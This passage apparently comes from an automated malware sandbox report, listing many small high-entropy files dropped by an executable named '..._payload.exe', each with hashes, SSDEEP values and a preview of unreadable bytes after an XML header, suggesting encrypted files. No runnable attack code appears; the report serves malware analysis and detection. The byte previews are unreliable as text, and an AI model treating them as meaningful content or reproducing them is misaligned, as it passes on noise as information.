                                                                                                Preview:<?xmleB.'...s.jP......k...l..U...HN..C,...W....91.....!.1,...I......J.>..\)...'..w.z.[9...W+.rR..@...OOq..;.h6u...a.,dL.......k....Z.UAd.%.....'..>G..Fb#U...SF..S....lzbv...A./P..a..?&...*.Zp.]%\....e.T....(w=,..|..j..QB....GS8.}4.d.|........X....(Lb^.m..u.l...d..v...:.hbQ...81.X.[..e..:.}..?..#.=.I..Gc5o.5xP1\..*V...[:i...#&..F..4...:...M.y..6.].^.2(0.e...d........)L".........T.R...mR~..F.FD.^K%J..f..RE...[....gX1....F.e$V@.F....PXZ8M..v..2.3d.....-.)...|....RU..O.5.#.}...o./<li.,.A[..L.B..2..".....m......'.9.+....U.X..9gY`C*F..]'.p..jl..oxU.)...!..R..i.."...J.....m._.s..q...i..Z..>..z.&uM.....v......7.4...`.H..`~.O...[XY..c...)h..0*.t...D.J..B.Jq.....-.....(..9..Adx.........9Ql..n.<E...S..Y.gV._.O...[..Bq.2~...z.1b.@...y.+..7J._d...#.X....0.U.Ip.X=.B.]...$8...D.5k..z.=....g........;..?...[..S..c..~...HX_.^LcK.>-c2..jM....].YA>. ..e....K.lT..-.!@.n..:.._......V~...P.......jP_..{.fp-. .....3@=..}.[L....2.h;X}a......"'..O.L......BR.......%.O......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1705
                                                                                                Entropy (8bit):7.879793619202393
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:b7Bc1IblP6P2XlJq4gr/m73VMGmL+8HkLD:bd2IbkP2XXv6lA
                                                                                                MD5:C893AED592112E8BB140A339834AB84D
                                                                                                SHA1:AD7EFD3280CF0CBAF2697A31FB60637B0541F21E
                                                                                                SHA-256:502E7197253AC325382B316CD924E574358C9E42D3DC7A477D98D92A7015C456
                                                                                                SHA-512:95AE0DA602BCD1AD7F7471E044BF1558926F5C5EFCEA155B41C414C96478F8D2BEA70EB7C805FFCC598574A402AA0B3F24D1223EC62617F4961B5A72C3823267
                                                                                                Malicious:false
                                                                                                Preview:<?xml.(.nr..1.k.+....o.....ZS..>.W">.u.@.U......S:.a*)@.]..,..McF..j.p........P.^..Q...)...}..N[.8Aesi...xM.pK(jy..+&..<.\.15.%....B...\~l.Z....'.).t.I.\.:...!z.9..z..%.Y....QcN.X.....a..().z...l.a..e&qy.ac#..8.<v.i.H.]...i.={U.L.8..i.g.N9....J.....T"r-k?..`/...|.vo.,.<g....#.17.........6!#.;...v...Q.........h..$i..;k..Q.'...8.gsv...E.{T.a.t.$....U*...:...{.*...1....P..FHd..>..h.-.....b..dU|.....9..I.P..=.sl...>Oc^.sse..3l......*mCH..k.98...ay$'..R.e{..H*5.k...v..<ps.X. A-.0;.$2..b$N....Y.....lq.7T7.w(Xg.;....|.....M.Z.l."..#.c."..i...i>..=59TT8.2.....6....J...]q...7:j.Q...cF..`....xrd...3....E.....g;.........z_.-S.!D......]F.X..kd...~.k..^.Rm.J..F.6.....n.]!G......7..m$&..h.%'..S.U.1.C^.U<..|).C-..M..(.td....,.[nM..g...K0...k..n...".vq......w....pI+.....4.......U..9[.,X....2D.o2/...u<C..;.....o......Oy.O.|...}%<..t....4..^..a....]"..3..2.......kX..-..N.?.8d!..$.r..[.l(.J.m3....b.....}j$OJ....r8..7.n.$.....a...<...-.*b9...x.}.\...EP
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1742
                                                                                                Entropy (8bit):7.885140559930427
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ZiVSHQ5mwo4OnTCtVMqClvH/9ygzqQyRo9GfLJQet0wxlutIuOFokQn5AZ/LfvSl:ZOy2MhT6M7lvHVAnR1fVlCI45A96LD
                                                                                                MD5:F7C45334ABDD2BCC8C6ED4B99C830728
                                                                                                SHA1:24211C8EAC1492BF4E89CBD0288DCAA1C39DB2BD
                                                                                                SHA-256:A268A23921D0943282FD41EDE0A2F9A3951DBDEA44E1BE7751FAD09B8C93ACF8
                                                                                                SHA-512:5F6FC9E1B1FC9253D706C77A9D36BC6E35F8B7FF73EA7D857E3E5C34562C598A45700C11350736A5ED8FC06F9C6F03EF67EE98E00BECF5992A0EF4AD06B4263E
                                                                                                Malicious:false
                                                                                                Preview:<?xmlW..2...|r.....,.|.........(..._......%..'K..5.T..?.M.<c.dc.MC.].....]7.M..F..Ba....J...g..ga...Ue..S...O!_q.Yt.JB[N..U+..k.t....WB.9I..]Z`...&V.b.MK..+).&p.....-}...V......S.Q.d.s;.3D/D..........X...(y;......J.W.....~z..?:..}.h..J.(.......\...........V....u..&.)Z.(..@].*j'.;W...8..v.Q.ls......Bv<.:.-....!N..LHP..1......9}.D...M..mQp....`Jl&:(....oh.....'..yW.......4p.#.h..-.Q....%i.5Z].RX+.G.E..n#.....+.......0....Yg......t ...B..J.rN..#}.F.."..Y..A.T.....~...v..c2.7...!..../...J.j(....DF...0...........x..gI.3..1...T....YK....\:.l..= .MHN..k.....x.X.v..;v....#.;..o..S..i........E`.$..B.d].1;v~.|Q ....>+....._...O.R.Z{.I...F......z....\g....U"...#.......?h.N..........@i..P.r4(.}.Ktu....>..U...d..Z...s.m}H0P.;.V.,...H..J8..V.0...*...\.sV..,My.......~.5.dm...y/mj.4.Zs.h....f..sl..y...R.....~-K....w+7.<..!J.8......0.:...]..8J..Wi......Z...\R......z..d.+.WAJS\.X=H..o.6g..G.F......+...!..T.. 4.C.......#..FxBXv...6n-"'...Nlev....H....MV....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1719
                                                                                                Entropy (8bit):7.888465799746532
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3xyKIMQgkZE9EmRrOzYHQZZIFN8hXnhsRLD:3xy+QvZAEmRmZZIFN8hKF
                                                                                                MD5:1F0976D3AC4A0CBCC3C4F1734B58445A
                                                                                                SHA1:752B1A44181D2A23F35FE5AF1E1F87E8B0BEB712
                                                                                                SHA-256:D1011FA631C8DAD8A0D43B04442F024AE1B129CB355E94F9628761FCE645ECBF
                                                                                                SHA-512:2C9C1A2ED7242599DBAAA8999E74345AF7E7EC0A086B185544790AEF7FD09F2A9885EC35BC8402974CE09E96B6D57F0FE7ACFE08FCB6463D842AC2FAB62AC8B7
                                                                                                Malicious:false
                                                                                                Preview:<?xml.#(....;}.`..."...L.>Q$m.........N..:v..i..|\>{.PS9.\..0.......F..y..| .W.....p.....G.^.B....h.1..(..7..>..j.S..Io.-...Ff.....).3.j.....6..{t,B..X...T6.7.k...!J.kj.../.X6W....o#Q.X..z.wu...iw<......Wh.%r3......0.@..[......T.&.B....w..n.1...n(.y.......Y.....6.OL..L.W.... .)9..].....4......h....^UN.k.kx.e.0...|Uo.[....."$....T..I.F2..d..5L~.2.~.8.}..u...........Z.dv..6.........>ZZ.E....&..c..\G..\....S..2...gNT.n2.........>.^s.L....bOKb..R[..=#...X.(...6..h9H..=sH.G.8.yv:..?').?.vY.._.F.....q.T..].V...C..$..6.*..~Ywu.b{..4B...L....g....#f.nX5..?`....t. ........u......w[...<..1..s.A.Dh...({cA...O.zH#..y|.m.wI..~i.....4....'...;..m.Z..6X..C.T.....#../..m.....x...M!^.d..N.d..hO..(n..Q.cj..J..D..;..X=~B3..$.m/.?..r....&P.PU.8...*......S*...\9+.n3..q....#..dF w......{.T..+...T.....c..u..9.....:jS._.k.}.M..A..9.x...).......!.w...L+.8..=..X...>..Y$<.72&y$eK..D..J.+.?..y1n*F.\...F....p.P...n.H.a..8..t.........Ze..N..b....p]..Vp...kz.8.....=.<.q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1756
                                                                                                Entropy (8bit):7.884258959236324
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:6qDZJakJh5VK1xvOaJWyqN0CRTNv/OBNhBSq3lZG8EfWVQgkn7tgalN2T/u42HMH:f9JhV8vO4AZzOHhBSYEuWgk7tgnm8LD
                                                                                                MD5:6A932D1D8EC3ECF792E4C91FCA921CDF
                                                                                                SHA1:78227C9FDBF03EFEDED3C911241AFBF12ABD2828
                                                                                                SHA-256:9A4B1357CDB6F94FD065611384677D3A44AABAE061443438AF46DA38257A78C9
                                                                                                SHA-512:68EF0E5E3211A85163830ABB30B08C44B0F7B6684BDD265F20ADB2E6D892B03C31ADACC7CE4AEEFC8D9FB1FB8BFE59C095C3925167AE55AB0D85A9AB6277A1EB
                                                                                                Malicious:false
                                                                                                Preview:<?xml.i.o&....Z.(..[L.........}.M.....e....P....Swk..6.-..t.. 28.....-....W.K,$UU.XI.,..T.:Q...!.ul...G......?...&..N......?...,?c.%..!.KS.X....F....P.....n..Ny...S:..{.w..u....._...2.O...p+....!.x,.24.).......E..q.JNl.8.._t\z...fL.6..,...7...Du...q.+.Z.. ..K.A..!YpJ.x.D.d..h./...p.jv....."^.Y.5.....p.,.....h....k.P....f.....Y..u.s#.]...jK.k.j....j.Y..|.oJzu..._9LV..ri...'..&..:.]<..2.S......c.W........d/%..!..:5..&....6JX.DpA..^&A8.j...<....j...>.5c.i...&.O.B.....R.Q.>....|B4coR`.R.......B.-a.LQ.p.b7Y!{98....<Z.X).8.........._...V.....G....Q~I4.3.._...7>...0...$....q.mq.#.K. .1.]o...L%..M..H.[....M.t+......CF.k.y..3..LU.]........l+%...<N.>.x+.VZ&....9.....9!N.o.!.D.$.{d....:6.P,....:...MB...P9?.N.-i....|.7n0...M'...!|8...z..!'..>..SG.....?xd.(....%F.'...qe..o..[.dp..K%^"v....[.*.C...#..".1+.x.f..enwRQ.D....@p..yl.MD.w..G.....y....=.... %.2.!.B..M.X.M....I.G..N{.w..2.N_...[=.0-.`.v.....%..w..1....6...!..._...<.....3.....?h..TQG.)r..m.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.895887133082534
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:giF4cl0YFRcH0udH5IYOr5tc0HqiSYYZPkofqV9xu4SuQd0DBkolRNqTovBXx3bD:ccTFRRI0HEYwVqs4SuQf7EBLD
                                                                                                MD5:C4619E772CFB274EC10BD845932F3EAB
                                                                                                SHA1:F4AB1031F41F93789C411E9B1AE7F67E805CE8FA
                                                                                                SHA-256:F5913921E7433971EEFD9FC787BA6B12F15F019638BED43C5BC62742332D8834
                                                                                                SHA-512:18F40A72C4BBFCB61A257D47706D945EBC6CBC6A7997FAB7B0B9E360AACF3FE81F7AA7A0E38048807AE268BCA8A8959010DB8601DA12B35157F8D437B719F323
                                                                                                Malicious:false
                                                                                                Preview:<?xml..Z...)...)y....f..W3e..=y:*".....{O.f..zOk.eOv4.=a.h.G=.-..\....l..2..cU,.N..xQ.yI.&8..s........{N..*.A...^..:...i.....zF.[...;|.S@..^......_lw...8~.haH...9.....'.T...........'Kvg...^ ...&y.K.....Z...-h........V.../.IS.px..q .......-......{.."$..eP.'..ofT]....k...r....!.X...^t..T@.%..7...8.PT.....L.....E...G.Ud=...j...4.....oC.V....AxZ.L..M.C...6..M...^. ....%B...d.......N...c.e.F...+.Z.c...A....a.WHM..l.?d.LV.1....6.%..^.,z....E9...X... .|.J0..n.`...s^..Gq...^./<..,V.;et.x.v.h6..[.D..4y..../...L[..jHd.....+...?'.,4...|.|T.GUY..0E...Td.[#.IG.r.m[M4Gp....j.K..#...R...3..........I.).Ph.1.*+.4Y].*....|....@..k....k...Fa..4.g..=.T..4.s.m.1.:...M..{...@t......K\...|{Z.h...3.t.....?@/{.U..T.Y=.=.]...B..w|....O....d.5..go.n|..c.(NV.ES...QG...O(.,E..r.aI..GuY .....e.}.^.........9.olq......t...>N|jA..1$....J.R...;>.]_.......G...2...W..*.$........o.......vG..XT.....MfP.....=..tz...P#....E+..7.....N.U.P..c.."..QN.....*.&.E.}....g.#j..s.....|.*..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.873981129176193
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:tNbX++R/lmtm0h1E2ZspljYb/hazc9TuHDQQpYxRtayfLD:ts+BlmA0hs5YrMzMujlpM4y/
                                                                                                MD5:DD395512B5A7276B426BC0C2D81BE912
                                                                                                SHA1:4A9062DB1EEB33040E6BB098EABB12ED68FBE3C9
                                                                                                SHA-256:15F5C6DFBAADD0B510DF05F3928DE00F7FBC8244BFE4DCD670020537EBB38FFD
                                                                                                SHA-512:32C1C4F313B19BF40AB45E8ACCCC881AFAC9AD96BC8F3D00407B95231B5B11AAD61AACD860EE0A06EB767BE6DF15B67D883CF721F4418C444AB5492E770F3339
                                                                                                Malicious:false
                                                                                                Preview:<?xml.j.K.i[...>..W...9...3..D...K.F....pD"D...gWP..$.S...Q...>zt,xD.S..T....YG.0.8..c.....j..5.&..T.*..N..r........#.`.#S)ni.P.~$.BF.{..<l].)..G.:.c...D..%....@..-c./...:$/.?{U_P#d._e.'.....P.ard..a....4.."...+%..A....7.-..f...p.*..Y}N..D..u......-L.L.]..pA.....I.?.......~.w....S21q..4..P..\x..?....c...:..2#.x....#.r...y...[..(&.;ybz..fI<.;...4.4ef..WS<Z.+.....a.D.^.....j.......z..+R.....@0...i18.I...W.(H+.8...l.e|~..,.I.....*.....O..(WP..1............V..[(.....z..z..Lq...q.g:.F...Ax.Tzx...^.Tk.2....t.k..dk...`".I.&.-S9..G[...3.0G.Uc^2../......C.o..8.Ab.g...a..'o...l.G.....#.G.....y.....-$g.....|..T.H~."..Rx.'>:U..#.! -.&.$......U."..X.]H.....y;.D.N..7.|.P|5..GJ..|.........^B.#M+.....Z..R........C..YG....<-w...;..D..X..]..,....~Iw:z0m/..Kk./..*.i........F'..p.......N.R..i.Q.ia..W.'.#....9..2..Q...............l.B=...Z.....{..K..L&e......3....J...O.....;.t.....\.L.C^..P.E.}..j6JWS..m.{...N...Y."..MC..j..k*....t.....)m.!.I....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1699
                                                                                                Entropy (8bit):7.8712150492850705
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:OhhJbVRlooAl8BTUWh/U/YM5DVWWMWCQ4oycnoLD:8JXAGB2VjyvF
                                                                                                MD5:5F1809038C31C49DE3AC64884F3163AE
                                                                                                SHA1:5223FFDF091E46ED909A3B35B11B09DBE52E4029
                                                                                                SHA-256:4460AFCAE75C4D6DA6C9DB262E1CEDC3CD1CF7C8DEC158CD799432FA83502216
                                                                                                SHA-512:1E2CACFC6BB3C297B901EACCA67E46940D170A705C26B60D933F51F0763EFEA915C14643FEEE8284F766AD9B5585A8C1B4453A39598E6BEA247A3294F4A32F0C
                                                                                                Malicious:false
                                                                                                Preview:<?xml.r.n.."L.._..%.JC.@.5..\V'.x......j...?...*.+...V...;n...c..]!F.t.L......1;.........x.'..T.#..,.......b.=.T.r...o...._./.lfe..4D....u....=....b..$.4.h.....u.GA*....(L.t.{|E...B.. ..>...P)A.."...c....o...a....A..!bM..m.....U...I.....p1.LJ..Uh.j...u#.(.Q.s_.h.9.[.^t....HCy]....:...8...m..4l...W3.U.G.h..".i!.....'?,........5B.....Mid.1....A...#..~....@...k@.Vk.Oua......Z.^...........y..m..........&....a..Vt..'v..8B.&^.... .1.@oTl....\L. ...7....K8.eu...U..e./..@.*..V1... ..Lgy:m..{.+..U.k..zM'....^...-B.u....n.E698...>..n..eXL.6...g.U......m.|*...r.A.L..b...(S.A...F..x...I.Vv(+P.d.XQ....S"...|.........YK~..|V.-.C.....0...|...i5.%..R....`...!q...oF.;M..}.P..Y...4..>.^P.8.ar.1PlN...5..QI.<...x......:...*.......[7--.L.8.'.H`....n...e.F..c.....0.hj<...:*B. 4..^...^...8.?L.B.........pSkFB.,I!6v.G{V}....&w%.\..........[%........B.>..<.<...;.asf........_....W..Ry..]...2".k.b.o...M.......;.f.[...>I.....F.D......t...{..1.k?!.t.}...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1736
                                                                                                Entropy (8bit):7.90020024366181
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:lTjcCXs6bbv9ZRuRDb+L/Wrfw2XupDtiPl7ON6EOsRAjgsBuLD:lncCca9Za3+zsEJGl7ON6EO8AEs4
                                                                                                MD5:19B8C2DC3527EFF0FC57C4986FBA9856
                                                                                                SHA1:E544925A5E2426D175EF7F1D3674F0CA04DF1701
                                                                                                SHA-256:17D52F541D9696C38254A092CDD0CA9C88081500DB055F09CA33A9662F383DB7
                                                                                                SHA-512:1FA43A05CBC880C36E56314F8B4F205FBFAEDC4989FFB1845816A033E913761441B6BB7A2A1BB81B25E009F9C04273B51D7ACA1926388BA2D7B5DCF4FDEACB82
                                                                                                Malicious:false
                                                                                                Preview:<?xml.y..3........Du@..} T......u..w........."..f.....7K@.P/. .2...V.~9>.J4.k..S....}U........._.h..r.k'...P.,..*...u.h.m.snM{R.V."qIyy..G[B(.'r.L.U..V..o.?..)B2....V.G-.y......#.r]....N5.$...[.\.~..HR.ej..6.x.c..ef......zN5'~D......F!..Lf..+.J..Ls.G.&.G...g.2P.^.(wE.._.....u.sS.e;@!..s......<h.1....v5...2..I....?....*k.....Ak/.P.....c..*...U..B.......R`J..-...~..I.31.....n.`g}..U..|AFDP...."..j..f...~...g....jv..a.N....{y.mP|.wZ.pn.d.g.{.2......).*GJ.dt....'..$ro~.!....H....).......8..jQu........Uc...X.~...Q]M./9...q......3.=.[..[ E..&....S..Q........9..mN3.....`..........^......QO...Wv.........i....+.................f....]K.._ ...`7'.k..v..i.?=...?....:..i-.....E..f.Q.......&]....#....6.AQ.....-..........m....O.Y.u....n..R.. LF.$.?.b.]s..>oOS.y.t....#Or....|..SAh..d{./.......@...&..t$.c....".%'nr..ra.+h.B.(..6...-.w9..G*0.:...D..D....y.E.s.#..f...;.U..o....K..b..U...G...J....e..l.K%..YDE.-.9.&..,...a..h,?Y.1..Q.Q....z...8..^)i.0J|.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1704
                                                                                                Entropy (8bit):7.871290024074949
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4WEjJX32eK4YkT0tLqdkoc/RUAHp10otjeciJaXE8MBx3bD:DEx32PvC4LBon6ntjec0EEPbLD
                                                                                                MD5:86C80255C0974BBF9A7D6BE3DF3B4027
                                                                                                SHA1:A3B730DCBF423805B7F6B89421223F73599E8054
                                                                                                SHA-256:ECF1B7F622957229464707749AC9C576DA73C165B412F1CB2A8B819F63D406F4
                                                                                                SHA-512:F21043BF2C2523790D529A20085AE012DB71772B447ADDAFE3B7006BFF0DD105ABF1853DFB8D0707DF97BE9D0775752A6120115286055A4252CC2E07744729DC
                                                                                                Malicious:false
                                                                                                Preview:<?xmll.+k...j..LLZ.<B e...N.VD...{y..+....h?.^..k.y...6=..tn..[....a.q`..6.5..$..A.h.+E..u*b...J.`t_...0..]..O.....yS!>..u.....d_.Gs...^.....(G.4.h...F4c....y..m...1.J.&..{._..I:]....yP....q.1......H.....{......A..E.G.6..K.....-....W..[..!X.p..rS.r.:....M.C.+a..2k.T$.h..TU..(?.^.k.V.=s.O......"...`D....L6...W.1...$..L..A<.....3.....j..D.}...bic.-.wE.q:...|...`...{g...2.....3W.B.H....5..b.*.yMB.]X.,g.h..{.0.GSU(.....o..;X.v.ny...GTS...F..P.G..F#."KIrWS.E(...m}.[`........+.V...y.".x...W.&.FBD..........p...._..ho....j..4:......V..HD.?.[..Oi....;....'...}T...p..5..}._TU%.^..w.,..}..%..5.V.........k...*....25.q.pZ.h.n...(.....h...m,4...".lV...'.r)...K7....J......}ok....... .1>....9.dd....K`.>..g...vK7........Q...}....".jB</\+YUI$b..XM...8.-9S..n...{P....I........rw..b.]A1T`..*.{\...+...`H.5H.....4/.....a...E..2fd!.N*S..kv..N.7$.T....a.9d.>.h.h.8....+e(>........;.....*C..M...<.R..=.1....[.G..7P2..h..0..I!...sC!W...N$..Q....B...@..)....7..*u.....e
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1741
                                                                                                Entropy (8bit):7.891641091559949
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ut+a+EM6RK+XKEIa7/DvosloFg9uyVQ/P7Cz6ePqLD:uULEMb+Ua7Dauw7jePq
                                                                                                MD5:DC4DEB414DA5AC12F5695903831B657E
                                                                                                SHA1:140423B1C55962A78E38C19FF27F33A316A664CB
                                                                                                SHA-256:5B0373E464E0F015176B7B2AE905A9DAF5B0F85BB75A13BFF9A7C03A99FC4E61
                                                                                                SHA-512:3A8082978DB98F3DD1AEB77CBF60154E7A4F2A542FBA28A920FC0BCD734FAE73C5FF6DA21A8DA54A6D97C85B61EC7F04B00FBC8DD86020A724B8A2D595A7B9C3
                                                                                                Malicious:false
                                                                                                Preview:<?xml.,..z.7$.9..54..oa...a..P.....~7.'.j.....,.....6..V...tL..|k}8.`.,j....&8&..+...5.G........:....`.W...@$.P......w._X~..?.Z..U.?q...E.Y..H..Cyz.M#.]..{B...A..t{...~......q..u.....7<|.W..)...n.<..6.._v..>.....'].....P..E.O_.l.|!. h/...;.e.vDc*6..H..m.uo}VK.AP.8"=_....L.=..\z/.m../@.y.\E..*..*...2s: /.W.H... t}.(...#..<..@".0zR..bN(.+........`. .{Xs..0.:~.u.......K..S._.q............g.x..KV..V._w.o..A......Q....-..hq2..<.......?8..6^t.a....."O._..q...pH..Jw6....75>...{...$.....0.W......X*..t.g. ....2..~Y.j...z..J~;..I.a.-...#L..I..X.B......6b.:.O...$.=....g..k.n..{..9g....w.....e.r......L..d.9......[.H.KA.i...myH...rG>.:%..+~z..a.D.P.9[..D..O.....yl.n]T..8?.)@..v.."..B.%3L.....i..jb.......@..]...........pU]_].8(....J~T..Gm....t.w^.&!w.j..K.G^..w......:.ev.z...z+q...5.s^....O1%.....S...X...$[+.uA.E&6."....p\.H1.., ..GQ....`..}..Z.d..{.m...<?.}.J....FC.i*...+...3A....4....S.&UVe.`......)tn..nFk...?......yFq.+..^..9.L.....k...\.....9...7.}he
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1703
                                                                                                Entropy (8bit):7.879081355552925
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:IfY2DlZw9/TSiri0Xxiu8NTtjK/7XdK7SULD:IZ5etBu0Xxd8VM/c7L
                                                                                                MD5:4786F01472849A543AED5F038FE89A21
                                                                                                SHA1:AD25021C76FA08930D72A323FDF039CE2CF88282
                                                                                                SHA-256:5C5787D22103F364C48566DB162761F52EF12D7F31D58B27053665926976504C
                                                                                                SHA-512:2B4A046302142AB8FDBD92F7085FF34D0B0B1B176139E79B334644EE2B2D4C592961C0AC6F5845EA84B8D166C281002B2CC352DD301707EF50C673E8FD68C35B
                                                                                                Malicious:false
                                                                                                Preview:<?xml...f/...e.....B=.3AS.w...yu....W...TX.W+...@57..3..(.......;>b.[.N.3.Y2....X.:..3."....e.TM....;..>-%.FL.y!`...L..?..I/.*7.y<N.3&..o.@...D8u.+.w.s.:.l..=+y.9"9.c.H..g.&..7......\<>.ia...".V.....!...6.#..S...~a......K,....`.S.{...uT.W.6.W}.p.......r..o..S....M'.t&...EwM....!}".....QT.P./|T......y...er.#....qw...W.y.E....f.o.{..s.'...[...W.C.....(.....X...c. .-(....Z.....BN#...x....1.k\.u'.y.ngC....B.-.Vbl6.....0....%....;=.H[`r. ./.{W3.mF.....x..W....[..p7u9PZ6E......B.?..\d.3"a...}.. Z....-4N................./Z......pP,.A..<..y...5.....UM[..$2mC..62......_.f.8...Mm..E....d...........=}a....o...Z6[.t...5.....py..<......_...M..!..k:~f,.........:.J....c?p...P...|f.B.".'........3..<....R..K..e..@...M+..O...7..z...`.?"..<..2.....pQ.....` .765.8.M..T.P.{......@r'U...b.....9.UUQ.4.............T.$...4..d/.6o..S...../.......N..f......;T#ik..4...l.(....zS>|.yj.O....~.........,.).....?O..............7.|..A.e...-h;..W.)..<a
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1740
                                                                                                Entropy (8bit):7.878100855596282
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ipKrERy3B0HTcWPoVMO7QoJDnPCUzfUL0oTGANsnLD:ipdFOFJ7VzWLTGOsn
                                                                                                MD5:782043BE1CC3F8D6B2C8FCC37ECC7EDE
                                                                                                SHA1:F975C43DFB26C66B1700224B5527CD5705B3A675
                                                                                                SHA-256:9F43F5F74A2CBCA55539FBA5E9803F5066B233A73D03857007052CE1AD8203D8
                                                                                                SHA-512:7155E7F9252E8863826CC902613E4E12605296639BB00F1D316A7FF5E577225CCDB52FE1F94A6601CE0FEF2EDE951501A70C80700F71A30101F8EE4DE44EA80E
                                                                                                Malicious:false
                                                                                                Preview:<?xml1{...u...r..UV.81.m...w.P9. k.g..4..U..D..=..\.J..H.hJ..j^{m.....49...7=.(FOJ`.8..Q.....x.......Y....;-v...H..3S..i.....*.....W.....0.-.3-.............V....Y%........ ..|..S....U2.$.....d...a.*.....ge.c.k...;...zn.....*.....zS9.h...c...un.UT.aY4...ju.L.{....d..D...f.e.tN........-......E._.U.E.}h..Q..Iy...R.........j...._q.}....~n0*.o.C..g../...x.YTij...`.......^....3.?..c....*.x.......lQ.U.;w.....F.@gG....W. m.|"..a....(.aj"\.......I.....3..Z"?...Q{.........i.%n8..-...B...u.......u.O:|-*.XC....\Y.>.Y....G.{...c...U.6@aoc.+.%..:.QZj..0..:.....j.....c..../.j......tn...=v..^^ ....?..n........>e0...._lVM6...7.Q......d&.i..Hz..W...k...'..jpTV.A..{(..S2uE.HQcCz..@..Rl....j_..7..H).VD.W.k....X=#.$...3.....g....K.".....)..Z. .0.a.M}....k.#hv..\.;.......`...^..h.qv}....~q.B..........XX.4c....h5.....Mb<.O.wOXD....C...6.A.7.z...x.s..|..L..~X ..M..w......<_..$.5..`QZ.........N.~....S#~A..<.....wI....H.'j.j.....9......g.....%o....r
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1713
                                                                                                Entropy (8bit):7.88450495528266
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:XFi1vzPwLEiB/t6fC09lC0IWY0u7Np0jbw6FpKdLD:XFqbwRZ2C09lC0+Nejb9pKJ
                                                                                                MD5:424F88B8AAEC55519A2CEAB554C0A51C
                                                                                                SHA1:3C638AF2D473B679E7F374824AB263DD49D875E3
                                                                                                SHA-256:FFD11ECBE49E3D661735C88C25ACB59C83EE2CBCD217B2536A1D61F465E1D0FC
                                                                                                SHA-512:0D6662FB492A0820DC269EEA1C838F71323E661C0E36B68F9F5DEDFC09BDF3C6A6B5DB5F9FEEF36376644FE06CDAF6E7B9ED751473D7D4FB840CA0721562F3BC
                                                                                                Malicious:false
                                                                                                Preview:<?xmlD(.h.......n..g....`e......N..p..(.....3._...YQ.`nE_./.h..B>,?.....".......gH:.{uG....i..3.<T<X.....8.../.IYU.9....)U..S.bQ9u...^......1..;.jG..50...C..O...,..0....&..& ...y.........~....@=...C....}.f..........`.."...e.'..]b`Yvc.t..G.7......n...l...G..O.aWo.A...n.......'...............X...3.....=|N|.m.zbA..s.....;.q..1Ft.IF..F.6....S.....q...............!.Pb$......VB..\.._.E..fPs..&..S....6...s.r.....?.....0.......0.\!.......f.m.E5....X..6@.....(.............O....]7.......bcD..8..`.PF.U/.'..i.Or.Nr.....H....iB.~2..%a.noc..g...].....p....Y..i.bT.1*T.3Mw.0K.......q.3A.....>.K.j........a._.?..$....*..><|.[-....-WMX.l.f.."[.....K..<..C>..F.{....^..FVv.Y..<..>............&?.....6+|.a.D*...i.W...w..g.>hf=o..W....Z0]...E..l..4.-.$..69.F1.tz....Z.S.....F29..J.0.]a]7(l..6...{.BC.ye...=(T....b.r<..a./..`.Ca=I.gv...N.{......F_t...I~.L.+.....Q.....N..i\h..m)......<R{@...U..?.....w...q.-....,9..o..U7...2....#`...H.q.%..i..v.r@.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
